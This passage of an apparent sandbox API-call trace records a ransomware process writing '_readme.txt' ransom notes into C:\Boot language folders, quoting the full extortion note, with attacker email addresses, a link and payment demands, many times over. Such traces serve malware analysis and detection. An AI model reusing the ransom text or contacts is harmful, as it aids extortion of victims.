dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.630] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0173.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.630] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.630] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.630] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.631] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.631] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.632] CloseHandle (hObject=0x690) returned 1 [0173.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.632] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e466de0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e466de0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.633] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e466de0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e466de0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.633] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.633] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e466de0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e466de0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.633] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e466de0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e466de0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.633] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.633] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.635] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0173.635] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.635] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.635] PathFindFileNameW (pszPath="") returned="" [0173.635] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.635] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.635] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.635] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.636] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0173.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.636] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0173.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.636] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.636] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.636] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.636] 